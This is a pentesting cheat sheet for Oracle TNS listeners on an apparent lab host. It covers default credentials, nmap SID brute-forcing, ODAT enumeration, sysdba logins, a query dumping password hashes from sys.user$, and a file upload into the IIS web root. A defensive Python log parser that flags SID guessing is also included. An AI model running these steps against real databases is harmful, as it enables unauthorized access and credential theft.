# Pentesting Oracle TNS

## Overview

* Default port: TCP 1521 (Oracle TNS Listener)
* Default passwords: Oracle 9 = `CHANGE_ON_INSTALL`, DBSNMP = `dbsnmp`

## Config Files

* Client-side: `$ORACLE_HOME/network/admin/tnsnames.ora`
* Server-side: `$ORACLE_HOME/network/admin/listener.ora`
* PL/SQL Exclusion List: `$ORACLE_HOME/sqldeveloper/`

## Scanning

```
sudo nmap -p1521 -sV 10.129.204.235 --open
sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
```
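
Detection-side view of the `oracle-sid-brute` scan above, as an added example that is not part of the original notes: each wrong SID guess is recorded in the listener log with return code 12505 (TNS-12505, unknown SID), so one source hitting many distinct unknown SIDs stands out. It assumes the classic text `listener.log` line layout; the function name, threshold and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the assumed classic text listener.log layout:
# timestamp * connect data * client address * event * SID * return code
SAMPLE_LOG = """\
12-MAR-2024 09:14:01 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.5.20)(PORT=40112)) * establish * XE * 0
12-MAR-2024 09:15:44 * (CONNECT_DATA=(SID=XEE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.5.20)(PORT=40120)) * establish * XEE * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
12-MAR-2024 09:20:10 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=ws1)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.9.77)(PORT=51001)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
12-MAR-2024 09:20:10 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=ws1)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.9.77)(PORT=51002)) * establish * PROD * 12505
12-MAR-2024 09:20:11 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=ws1)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.9.77)(PORT=51003)) * establish * TEST * 12505
12-MAR-2024 09:20:11 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=ws1)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.9.77)(PORT=51004)) * establish * XE * 0
"""

# Source IP is taken from the ADDRESS block, not the client-supplied CID host.
ENTRY = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* .*?"
    r"\(ADDRESS=\(PROTOCOL=tcp\)\(HOST=(?P<src>[^)]+)\)\(PORT=\d+\)\) \* "
    r"establish \* (?P<sid>\S+) \* (?P<rc>\d+)$"
)

def sid_guessing_sources(log_text, min_distinct_sids=3):
    """Return {source_ip: sorted unknown SIDs} for sources at or above the threshold."""
    unknown = defaultdict(set)
    for line in log_text.splitlines():
        m = ENTRY.match(line.strip())
        # 12505 = listener does not know the requested SID (a wrong guess)
        if m and m["rc"] == "12505":
            unknown[m["src"]].add(m["sid"])
    return {src: sorted(sids) for src, sids in unknown.items()
            if len(sids) >= min_distinct_sids}

if __name__ == "__main__":
    for src, sids in sid_guessing_sources(SAMPLE_LOG).items():
        print(f"possible SID guessing from {src}: {', '.join(sids)}")
```

The single mistyped SID from `10.0.5.20` stays below the threshold, while the source that cycles through several unknown SIDs is reported.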

## ODAT Setup

```
sudo apt-get install -y build-essential python3-dev libaio1
pip3 install colorlog termcolor passlib python-libnmap pycryptodome
git clone https://github.com/quentinhardy/odat.git && cd odat/
git submodule init && git submodule update
sudo apt-get install python3-scapy -y
```

## ODAT Enumeration

```
./odat.py all -s 10.129.204.235
```

## SQLplus

```
sqlplus scott/tiger@10.129.204.235/XE
sqlplus scott/tiger@10.129.204.235/XE as sysdba
```

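If `sqlplus` fails with a shared library error, add the Instant Client library directory to the dynamic linker configuration and refresh the cache: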

```
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf"
sudo ldconfig
```

## SQL Commands

```sql
select table_name from all_tables;
select * from user_role_privs;
select name, password from sys.user$;
```

## File Upload via ODAT

```
echo "Oracle File Upload Test" > testing.txt
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
curl -X GET http://10.129.204.235/testing.txt
```

## Default Web Root Paths

| OS      | Path               |
| ------- | ------------------ |
| Linux   | /var/www/html      |
| Windows | C:\inetpub\wwwroot |
